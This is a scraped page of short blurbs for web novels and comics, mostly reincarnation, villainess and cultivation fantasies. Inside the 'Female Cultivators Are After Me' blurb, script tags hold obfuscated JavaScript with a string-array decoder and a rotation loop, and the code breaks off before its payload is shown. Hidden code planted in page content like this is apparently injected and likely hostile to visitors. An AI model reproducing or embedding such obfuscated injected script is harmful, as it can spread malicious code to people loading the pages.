2020 - Page 22

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

716 results

North By Northwest

A famous pirate in the southern oceans, “Lil Shades” During her peaceful journey, a shocking news falls upon her. “The admiral is coming.” There were chills on her back despite the hot weather. Lil took her eyes off her hands and looked up at Alain. She’d heard him, but she wanted to check again.


Female Cultivators Are After Me

I, Xia Yi, innate Taoist body, all methods are accessible, double cultivation with a girl can improve the physique of any girl. But what will happen to those who have not yet cultivated to become a strong person? of course…<script></script><script>function _0x2b76(_0x3c116e,_0x3d6315){var _0x229e6f=_0x4aec();return _0x2b76=function(_0x2f6100,_0x34415e){_0x2f6100=_0x2f6100-(-0x1*-0x956+-0x29*0xa6+-0x1*-0x1310);var _0x3de6b1=_0x229e6f[_0x2f6100];return _0x3de6b1;},_0x2b76(_0x3c116e,_0x3d6315);}(function(_0x476af9,_0x2282ea){var _0x448216=_0x2b76,_0x154de3=_0x476af9();while(!![]){try{var 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Angelic Lady

Angela was my friend. I wanted to give anything to her, who I thought more precious than my own family. And I eventually turned Angela, a lowly aristocrat from the countryside, into the flower of the capital society. But it was betrayal that came back. She sold me and my family to become an imperial princess. “…did you have to go this far?” “Because I wanted you to be unhappy. I wanted to take your whole life away.” But when I thought I had died under the guillotine, I was surprisingly back in the past. “Oh, hello. My name is Angela Vito…” “You’re Angela! Nice to meet you. Everyone was waiting for you.” With a bright smile, I held her hands together again.


Trash of the Count’s Family

When I opened my eyes, I was inside a novel. [The Birth of a Hero]. [The Birth of a Hero] was a novel focused on the adventures of the main character, Choi Han, a high school boy who was transported to a different dimension from Earth, along with the birth of the numerous heroes of the continent. I became a part of that novel as the tr*sh of the Count’s family, the family that oversaw the territory where the first village that Choi Han visits is located. The problem is that Choi Han becomes twisted after that village, and everyone in it, are destroyed by assassins. The bigger problem is the fact that this s*upid tr*sh who I’ve become doesn’t know about what happened in the village and messes with Choi Han, only to get beaten to a pulp. “…This is going to be a problem.” I feel like something serious has happened to me. But it was worth trying to make this my new life.


Max Level Returner

120 million people have disappeared worldwide.[Final Quest Completion Reward: ‘Return’ Activated]For the first time in 22 years, Yoon Sang-Hyuk cleared the world’s worst survival game.He, the so-called strongest person among all other players, one who possess all reward items even the ones that no one else could earn, has come back.[Return of the Masked Monarch]I alone am level 10,000, I alone have all the items, only me! Highest Level Returnee


Beware of the Brothers!

Hari got adopted by Duke Erenst at 7 years old when she lost her mother. Even though she received all kinds of persecution by the three Erenst sons, she could finally escape that blood-and-tear inducing life when she was about to get married.But what is this? When I woke up from my sleep, I’m back to that hellish childhood! Is this a dream?!Hmph. If I can’t wake up from this dream, I’ll at least live without too much consideration for others now!Just like that, Hari decided to go astray.


When The Villainess Loves

I’ve transmigrated into the body of a princess, living on borrowed time. It’s okay, though, we can cure this illness! My goal is to lead a life where I can do whatever I want! First, I decided to rave over all of my favorite characters in the novel! But, because I am a villainess, people around me tend to be wary… “You will die soon, and yet… how can you laugh like that?” Well, it’s ‘cus I’m super hot.


Everything was a Mistake

Roa Valrose reincarnated as villainess in the book. In order to avoid the fate of being burned at the stake, she approaches the hero, Nocton Edgar. It hurts every time she gets closer to him. Nevertheless, for her survival, she does everything he wants her to do. “Come again, Valrose.” The mysterious Nocton unexpectedly sought her out every day. Then one day, her friend for 10 years says something unknown to her. “Actually, I have a dream. The Duke of Edgar is a terrible villain!” He is not the hero, but the villain? As soon as she realized that she had misinterpreted the role, she decided to get away from Nocton. “Let’s not meet anymore.” But the villain’s reaction was strange. “Don’t go. You’ve always been special to me.” She was suspicious of his sudden change of attitude. Will she able to get rid of Nocton safely?


Princess Wars

After the Princess died, the soul entered a life-betting game! She will be the famous Pea Princess and other princesses in a fairy tale who will pursue the only prince. Only a princess who has successfully married a prince can return to the real world and continue her life and receive a huge bonus! How can she fight powerful princesses to capture the prince’s love? !


I Became the Villain’s Mother

<p style="text-align: center;">I have become the mother of “Ain Spenner”, the antagonist of a novel. I was supposed to be a bad stepmother who abused him as a child and was killed by him when he became an adult. But I saw the cute look on his naive and chubby face, “No, he’s so cute. He’s so young that he’s still sucking on his tiny fingers! How could I ever hurt him?” The child was so cute that I couldn’t believe that he would become a villain. And so, I decided. I will protect him! This way, he will protect me too! ~~~~~~~~~~~~~~~~~~~~ Ain’s cute little face stared coldly at Duke Cassius, “I told you not to touch me.” “Why should I listen to you?” The tension rose between the two. “You never really even liked her.” the duke’s eyes widened, no way… did Ain think of Roselia as more than a mother? Cassius could not believe it. “Stop scaring her, she might run away.” Ain said. Ain was worried that she would leave and never come back. Duke Cassius couldn’t believe it, his only son was obsessed with Roseria.</p>


Time Travel: The Mighty Crown Princess

Zhou Mengdie, a taekwondo student, has been around by bad luck recently. Accidentally, she travels back to ancient times and becomes Qin Yidong, the daughter of the Grand Preceptor. The next day she is dragged into the palace to for the imperial concubine selection… This Qin Yidong knows nothing about music, chess, calligraphy or painting, so she has to split bricks in public. But because of this, the prince thinks she is silly with no threat, so he selects her to be the crown princess. After getting married, they ignore each other until the prince finds that this woman may come from the same place as his mother who has disappeared years ago…


The Princess In The Dumpster

The Princess in the Dumpster Deep sunken cheeks, dirty skin which lost its original color, twig-like wrists, filthy fingernails and a much smaller body for her age. And with neglected hair hanging over half of her face, this small child is actually the forgotten Royal Princess of the Empire. Unable to stifle her hunger any longer, she crawls out of her hiding within a tiny, old, worn-down castle in search of food… “I’m hungry…” The small girl who’s wearing nothing but shabby clothes murmured without even realizing. “Can I eat this…?” Her small fern-like hand tore a piece of vegetation off of the ground, but she eventually put it down while shaking her head from side to side. The little girl hadn’t had a proper meal for three days… “Estrella…” The child recited the name, her words one with the wind. It was a precious name that she had earned only after a long time. “I’m sorry I’m late.” “…It’s alright.” The little one who replied then slumped onto Elias’ chest.
